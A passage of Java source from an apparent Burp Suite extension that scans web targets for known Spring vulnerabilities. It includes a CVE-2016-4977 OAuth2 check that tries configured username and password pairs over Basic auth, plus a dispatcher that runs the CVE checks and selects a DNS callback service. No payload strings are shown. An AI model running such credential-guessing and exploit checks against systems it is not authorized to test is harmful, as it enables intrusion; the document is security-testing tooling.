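        String[] usernames = ((String)payloads.get(0)).substring(9).split(",");
        String[] passwords = ((String)payloads.get(1)).substring(9).split(",");
        String payload = (String)payloads.get(2);
        this.burpExtender.stdout.println("用户名:" + Arrays.toString(usernames) + "\n密码:" + Arrays.toString(passwords) + "\npayload:" + payload);

        IHttpRequestResponse firstUnauthorized = null;
        for (String username : usernames) {
            for (String password : passwords) {
                String up = this.helpers.base64Encode(username + ":" + password);
                IHttpRequestResponse requestResponse = this.makeRequest(httpRequestResponse, payload, up);
                byte[] rawResponse = requestResponse.getResponse();
                if (rawResponse == null) {
                    // Connection-level failure: nothing to analyse for this pair.
                    this.burpExtender.stderr.println("[!] No response for user " + username);
                    continue;
                }
                IResponseInfo responseInfo1 = this.helpers.analyzeResponse(rawResponse);
                this.burpExtender.stdout.println("响应状态码:" + responseInfo1.getStatusCode());
                // getBodyOffset() is a byte offset; slice bytes before converting to text.
                String body = this.helpers.bytesToString(Arrays.copyOfRange(rawResponse, responseInfo1.getBodyOffset(), rawResponse.length)).toLowerCase();
                if (body.contains("response types: [4]")) {
                    this.updataHttp = requestResponse;
                    this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞 ===========================\n");
                    return new SpringIssue(url, "Spring Security OAuth2 RCE", 0, "High", "Certain", (String)null, (String)null, "There is a vulnerability, but you need other tools to take advantage of it!", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService());
                }

                if (responseInfo1.getStatusCode() == 401 && firstUnauthorized == null) {
                    // Endpoint exists but this pair was rejected; keep trying the remaining pairs
                    // (previously the first 401 ended the loop before other credentials were tried).
                    firstUnauthorized = requestResponse;
                }
            }
        }

        if (firstUnauthorized != null) {
            this.burpExtender.stdout.println("===========================检测完毕!可能存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞 ===========================\n");
            this.updataHttp = firstUnauthorized;
            return new SpringIssue(url, "Spring Security OAuth2 RCE", 0, "Medium", "Certain", (String)null, (String)null, "There may be a vulnerability because the same authentication failed", (String)null, new IHttpRequestResponse[]{firstUnauthorized}, firstUnauthorized.getHttpService());
        }

        this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞 ===========================\n");
        return null;
    }

    /**
     * Sends {@code GET <payload>} (the configured path) with the original request's headers, any
     * existing Authorization header replaced by {@code Basic <up>}, and an empty body.
     *
     * @param payload request path (inserted into the request line unescaped; comes from config.yml)
     * @param up      base64 of {@code user:password}
     */
    private IHttpRequestResponse makeRequest(IHttpRequestResponse httpRequestResponse, String payload, String up) {
        IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse);
        List<String> headers = requestInfo.getHeaders();
        String version = headers.get(0).contains("HTTP/1.1") ? "HTTP/1.1" : "HTTP/2";
        headers.set(0, "GET " + payload + " " + version);
        // Replace rather than duplicate an Authorization header carried over from the proxied request.
        headers.removeIf((header) -> {
            return header != null && header.toLowerCase().startsWith("authorization:");
        });
        headers.add("Authorization: Basic " + up);
        IHttpService service = httpRequestResponse.getHttpService();
        // The payload is the request path; a GET carries no body (previously the path text was
        // also sent as the body).
        byte[] newRequest = this.helpers.buildHttpMessage(headers, new byte[0]);
        return this.burpExtender.callbacks.makeHttpRequest(service, newRequest);
    }

    /** Request/response pair of the last finding, or {@code null} when nothing was found. */
    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/WebFlowRCE.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IHttpRequestResponse;
import burp.IScanIssue;
import burp.DnsLog.DnsLogInterface;
import burp.payload.Payload;

/**
 * Placeholder check, presumably for Spring Web Flow (CVE-2017-4971; ScanPayload.check17_4971 is
 * likewise empty). Not implemented: doCheckVul() performs no request and always returns
 * {@code null}, so selecting this entry in the UI never produces a finding.
 */
public class WebFlowRCE implements Payload {
    private BurpExtender burpExtender;
    private IHttpRequestResponse updataHttp; // never assigned; export() always returns null

    public WebFlowRCE(BurpExtender burpExtender) {
        this.burpExtender = burpExtender;
    }

    /** Stub: no request is sent and nothing is reported. */
    public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) {
        return null;
    }

    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/ScanPayload.java:
--------------------------------------------------------------------------------
package burp.payload;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IScanIssue;
import 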
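burp.DnsLog.DnsLogInterface;
import burp.DnsLog.Platform.BurpCollaborator;
import burp.DnsLog.Platform.DnsLogCn;
import burp.auxiliary.CheckIsSpring;
import burp.payload.RCE.APIunauthorized;
import burp.payload.RCE.CloudFramework;
import burp.payload.RCE.CloudFuncionSpEl;
import burp.payload.RCE.CloudGatewaySpEl;
import burp.payload.RCE.SecurityOAuth2RCE;
import java.io.FileNotFoundException;
import java.util.Objects;

/**
 * Runs the check(s) selected in the settings UI against one request and records the outcome.
 *
 * <p>Results: {@link #getIsVul()} is -1 (nothing found), 0 (a finding below High) or 1 (High);
 * {@link #getVulDetails()} and {@link #getVulHttp()} hold the issue and its request/response.
 * With "ALL" selected the checks run in sequence and each finding overwrites the previous one,
 * so only the last check that fired is reported — NOTE(review): an earlier High finding can be
 * replaced by a later Medium one; consider keeping the highest severity instead.
 * The CVE-2018-1273, CVE-2017-4971 and CVE-2018-1270 entries are not implemented (empty methods).
 */
public class ScanPayload {
    private int isVul;                       // -1 none, 0 below High, 1 High
    private IScanIssue vulDetails;           // last finding, or null
    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    private String vulId;                    // selection from the settings UI, e.g. "ALL" or a CVE id
    private CheckIsSpring checkIsSpring;
    private DnsLogInterface dnsLogPlatform;  // null when the selected backend is unknown
    private IHttpRequestResponse vulHttp;    // request/response behind the last finding

    public ScanPayload(BurpExtender burpExtender, IExtensionHelpers helpers, IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException, InterruptedException {
        this.burpExtender = burpExtender;
        this.helpers = helpers;
        this.vulId = this.burpExtender.tags.getSettingUi().getVulId();
        this.checkIsSpring = new CheckIsSpring(this.burpExtender, this.helpers);
        this.isVul = -1;
        this.initDnslog();
        this.init(iHttpRequestResponse);
    }

    /** Dispatches on the UI selection; anything unrecognised falls back to the API-route check. */
    private void init(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
        if (this.vulId.contains("ALL")) {
            this.checkApi(iHttpRequestResponse);
            this.check22_22965(iHttpRequestResponse);
            this.check22_22963(iHttpRequestResponse);
            this.check22_22947(iHttpRequestResponse);
            this.check18_1273(iHttpRequestResponse);
            this.check18_1270(iHttpRequestResponse);
            this.check17_4971(iHttpRequestResponse);
            this.check16_4977(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2016-4977")) {
            this.check16_4977(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2017-4971")) {
            this.check17_4971(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2018-1270")) {
            this.check18_1270(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2018-1273")) {
            this.check18_1273(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2022-22947")) {
            this.check22_22947(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2022-22963")) {
            this.check22_22963(iHttpRequestResponse);
        } else if (this.vulId.contains("CVE-2022-22965")) {
            this.check22_22965(iHttpRequestResponse);
        } else {
            this.checkApi(iHttpRequestResponse);
        }
    }

    /**
     * Records a finding from one check: evidence comes from the payload's export(), and isVul is
     * 1 for a "High" issue and 0 for any other non-null issue. A null issue leaves state untouched.
     */
    private void record(Payload payload, IScanIssue issue) {
        if (issue == null) {
            return;
        }
        this.vulHttp = payload.export();
        this.vulDetails = issue;
        this.isVul = Objects.equals(issue.getSeverity(), "High") ? 1 : 0;
    }

    public void check22_22965(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
        CloudFramework cloudFramework = new CloudFramework(this.burpExtender, this.helpers, this.checkIsSpring);
        this.record(cloudFramework, cloudFramework.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform));
    }

    public void check22_22963(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
        CloudFuncionSpEl cloudFuncionSpEl = new CloudFuncionSpEl(this.burpExtender, this.helpers, this.checkIsSpring);
        this.record(cloudFuncionSpEl, cloudFuncionSpEl.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform));
    }

    public void check22_22947(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
        CloudGatewaySpEl cloudGatewaySpEl = new CloudGatewaySpEl(this.burpExtender, this.helpers, this.checkIsSpring);
        this.record(cloudGatewaySpEl, cloudGatewaySpEl.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform));
    }

    /** Not implemented (CVE-2018-1273): no request is sent, no finding recorded. */
    public void check18_1273(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
    }

    /** Not implemented (CVE-2017-4971): no request is sent, no finding recorded. */
    public void check17_4971(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
    }

    public void check16_4977(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
        SecurityOAuth2RCE securityOAuth2RCE = new SecurityOAuth2RCE(this.burpExtender, this.helpers, this.checkIsSpring);
        this.record(securityOAuth2RCE, securityOAuth2RCE.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform));
    }

    /** Not implemented (CVE-2018-1270): no request is sent, no finding recorded. */
    public void check18_1270(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
    }

    /**
     * Route-leak check. Unlike the CVE checks it always publishes the payload's export() as
     * vulHttp (even without a finding) and every finding counts as isVul = 0.
     */
    public void checkApi(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException {
        APIunauthorized apIunauthorized = new APIunauthorized(this.burpExtender, this.helpers, this.checkIsSpring);
        IScanIssue issue = apIunauthorized.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform);
        this.vulHttp = apIunauthorized.export();
        if (issue != null) {
            this.vulDetails = issue;
            this.isVul = 0;
        }
    }

    /**
     * Selects the callback platform from the settings UI. An unrecognised name leaves
     * dnsLogPlatform null, which the reverse-check payloads cannot cope with, so it is logged.
     */
    private void initDnslog() throws InterruptedException {
        String backendSelected = this.burpExtender.tags.getSettingUi().getBackendPlatform().toString();
        switch (backendSelected) {
            case "BurpCollaborator":
                this.dnsLogPlatform = new BurpCollaborator(this.burpExtender.callbacks);
                break;
            case "DnsLogCn":
                this.dnsLogPlatform = new DnsLogCn(this.burpExtender);
                break;
            default:
                this.burpExtender.stderr.println("[!] Unknown callback platform '" + backendSelected + "'; reverse (DNS) checks will not work.");
        }
    }

    public IHttpRequestResponse getVulHttp() {
        return this.vulHttp;
    }

    public int getIsVul() {
        return this.isVul;
    }

    public IScanIssue getVulDetails() {
        return this.vulDetails;
    }
}
--------------------------------------------------------------------------------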